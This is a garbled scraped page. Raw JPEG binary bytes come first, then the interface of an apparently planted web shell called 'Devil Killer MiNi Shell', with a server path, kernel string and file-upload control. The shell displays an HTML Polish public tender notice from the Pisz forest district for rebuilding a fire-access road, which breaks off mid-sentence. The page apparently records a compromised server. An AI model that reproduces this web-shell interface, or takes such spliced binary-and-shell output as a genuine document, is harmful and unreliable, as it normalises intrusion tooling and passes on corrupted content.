JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250728/0034751501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi leśnej dojazdu pożarowego nr 5 - etap II (odcinek od km 4+690 do km 9+134) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Pisz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790011285</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gdańska 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pisz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">12-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pisz@bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pisz.bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi leśnej dojazdu pożarowego nr 5 - etap II (odcinek od km 4+690 do km 9+134) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1de11ef2-2eed-4a52-8a3a-1d8d5dc99f5e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00347515</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00110850/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa dojazdu pożarowego nr 5 - etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_pisz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_pisz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/pn/lasy_pisz .<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami,<br/>w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl<br/>i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację za<br/>pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami:<br/>pisz@bialystok.lasy.gov.pl .<br/>3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>Zamawiający, zgodnie z § 11 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452) zamieszcza wymagania<br/>dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych<br/>za pośrednictwem platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych przetwarzanych w związku z<br/>prowadzeniem postępowania o udzielenie zamówienia publicznego jest Nadleśnictwo Pisz ul. Gdańska 24, 12-200 Pisz, +48 (87)<br/>424 15 00, pisz@bialystok.lasy.gov.pl, zwane dalej Administratorem.<br/>2. Wyznaczyliśmy inspektora ochrony danych. Jest to osoba, z którą mogą się Państwo kontaktować we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. W sprawach<br/>związanych z przetwarzaniem danych osobowych proszę kontaktować się z Inspektorem Ochrony Danych Osobowych pod adresem<br/>e-mail: iod@drmendyk.pl<br/>3. Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną<br/>ich przetwarzania jest art. 6 ust 1 lit c) RODO (obowiązek prawny) oraz następujące przepisy prawa:<br/>1) ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych,<br/>2) ustawa o narodowym zasobie archiwalnym i archiwach.<br/>4. Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane będą przez okres 5 lat:<br/>od dnia zakończenia postępowania o udzielenie zamówienia. 5. Przekazywanie danych: Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia<br/>publicznego jest jawne.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie<br/>w szczególnych przypadkach.<br/>Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o zamówienie publiczne mogą być podmioty z<br/>którymi administrator zawarł umowy na obsługę techniczną, prawną itp.<br/>6. W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa dane nie są przekazywane poza EOG.<br/>7. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego<br/>przysługują Państwu następujące uprawnienia:<br/>1) Prawo dostępu do danych. Zamawiający żąda od osoby występującej z żądaniem wskazania dodatkowych informacji, mających<br/>na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>2) Sprostowania lub uzupełnienia danych. Skorzystanie przez osobę nie może naruszać integralności protokołu postępowania oraz<br/>jego załączników, skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>3) Ograniczenia przetwarzania. W postępowaniu o udzielenie zamówienia zgłoszenie żądania nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>4) Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa).<br/>8. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe, ale może być<br/>warunkiem niezbędnym do wzięcia w nim udziału.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.32.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa drogi leśnej technologicznej stanowiącej dojazd pożarowy nr 5 w leśnictwach Leszczyna i Lipnik – etap II<br/><br/>Odcinek drogi leśnej od km 4+690 do km 9+134.<br/>Zakres zamówienia obejmuje: <br/>Przebudowa drogi leśnej technologicznej stanowiącej dojazd pożarowy nr 5 w leśnictwach Leszczyna i Lipnik – etap II<br/>ETAP II - odcinek drogi leśnej od km 4+690 do km 9+134<br/>Zakres zamówienia obejmuje: <br/>Przebudowa drogi leśnej – dojazdu pożarowego nr 5, odcinek od km 4+690 do km 9+134<br/>Zakres robót objętych projektem przewiduje:<br/>- prace przygotowawcze,<br/>- roboty ziemne,<br/>- ułożenie warstw konstrukcyjnych jezdni i zjazdów,<br/>- wykonanie nawierzchni jezdni i zjazdów,<br/>- montaż ochronnych barier stalowych,<br/>- prace porządkowe i wykończeniowe,<br/>- montaż oznakowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty stosowane będą następujące kryteria:<br/>1) Cena (C) – 60%<br/>2) Okres gwarancji (G) – 40%<br/>2. Ocena poszczególnych kryteriów będzie obliczana oddzielnie według następującego wzoru:<br/>1) Cena – 60%<br/>C = Cn / Cb x 100 pkt x 60%<br/>gdzie: C – liczba punktów w ramach kryterium „Cena”; Cn – łączna cena brutto oferty z najniższą ceną, Cb – łączna cena brutto<br/>oferty badanej<br/>2) długość okresu udzielonej gwarancji – 40%<br/>Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 60 miesięcy liczone od daty dokonania odbioru końcowego<br/>robót.<br/>Najdłuższy możliwy okres gwarancji wymagany przez Zamawiającego to 108 miesięcy liczone od daty dokonania odbioru<br/>końcowego robót.<br/>Faktyczna ilość punktów zostanie obliczona następująco:<br/>- okres gwarancji – 108 miesięcy – 40 pkt<br/>- okres gwarancji – 96 miesięcy – 30 pkt<br/>- okres gwarancji – 84 miesiące – 20 pkt<br/>- okres gwarancji – 72 miesiące – 10 pkt<br/>- okres gwarancji – 60 miesięcy – 0 pkt<br/>W tym kryterium można maksymalnie uzyskać 40 punktów.<br/>Wykonawca może zaoferować okres gwarancji wyłącznie na ilość miesięcy wskazaną wyżej. W innym przypadku oferta zostanie<br/>odrzucona jako niezgodna z treścią SWZ. Zamawiający odrzuci jako niezgodną z treścią SWZ ofertę Wykonawcy, który zaoferuje<br/>okres gwarancji krótszy niż 60 miesięcy. W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 108 miesięcy,<br/>Zamawiający przyzna w tym kryterium Wykonawcy 40 pkt.<br/>Jeśli Wykonawca nie wypełni pola na druku oferty, Zamawiający przyjmie, że okres gwarancji wynosi 60 miesięcy, co skutkuje nie<br/>przyznaniem punktów w ramach tego kryterium.<br/>W umowie w sprawie zamówienia publicznego obowiązywać będzie okres gwarancji zadeklarowany przez Wykonawcę w ofercie.<br/>3. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem:<br/>O = C + G<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>4. Po dokonaniu oceny ofert w poszczególnych kryteriach, nastąpi podsumowanie przyznanych punktów, do dwóch miejsc po<br/>przecinku. Oferta, która otrzyma najwyższą liczbę punktów, zostanie wybrana jako najkorzystniejsza.<br/>5. Zamawiający poprawi w ofercie oczywiste omyłki pisarskie i oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji<br/>rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z dokumentami zamówienia,<br/>niepowodujące istotnych zmian w treści oferty – niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została<br/>poprawiona.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert<br/>lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego<br/>7. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a<br/>jeżeli zostały złożone oferty o tej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych<br/>niż zaoferowane w złożonych ofertach<br/>8. Zamawiający odrzuci ofertę w sytuacjach określonych w art. 226 ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) w zakresie sytuacji ekonomicznej lub finansowej Wykonawca powinien wykazać<br/>dysponowanie środkami finansowymi lub zdolnością kredytową nie mniejszą niż 2.500.000<br/>złotych (słownie: dwa miliony pięćset tysięcy złotych).<br/>2) W zakresie zdolności technicznej lub zawodowej Wykonawca powinien wykazać:<br/>2.1) należyte wykonanie przez Wykonawcę w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwoma odrębnymi robotami budowlanymi polegającymi<br/>na budowie lub przebudowie drogi o nawierzchni bitumicznej o wartości robót co najmniej 3 500 000,00 złotych brutto;<br/>2.2) dysponowanie co najmniej Kierownikiem budowy posiadającym uprawnienia budowlane w specjalności drogowej<br/>uprawniające do kierowania robotami budowlanymi wydane zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z<br/>dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów, a także dopuszcza się również odpowiadające im uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a<br/>oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2025 r. poz. 418 ze zm.) oraz ustawy z<br/>dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t. j. Dz. U. 2023 r. poz. 334 ze zm.), które pozwalać będą na pełnienie funkcji Kierownika budowy w zakresie<br/>objętym umową. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">celu potwierdzenia braku<br/>podstaw wykluczenia:<br/>a) oświadczenie wykonawcy (zgodnie z Załącznikiem nr 7 do SWZ) o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego;<br/>b) oświadczenie Wykonawcy w zakresie przepisu art. 108 ust. 1 pkt 5) ustawy o braku przynależności do tej samej grupy kapitałowej,<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy, należącego do tej samej grupy kapitałowej (wzór stanowi załącznik nr 8 do<br/>SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty każdy Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 2 do SWZ. Oświadczenie stanowi dowód<br/>potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo<br/>zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>4. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, o których mowa w ust. 5.<br/>5. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 2.500.000 zł, w okresie nie wcześniejszym niż 3 miesiące<br/>przed jej złożeniem. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganej przez zamawiającego informacji, o<br/>której mowa 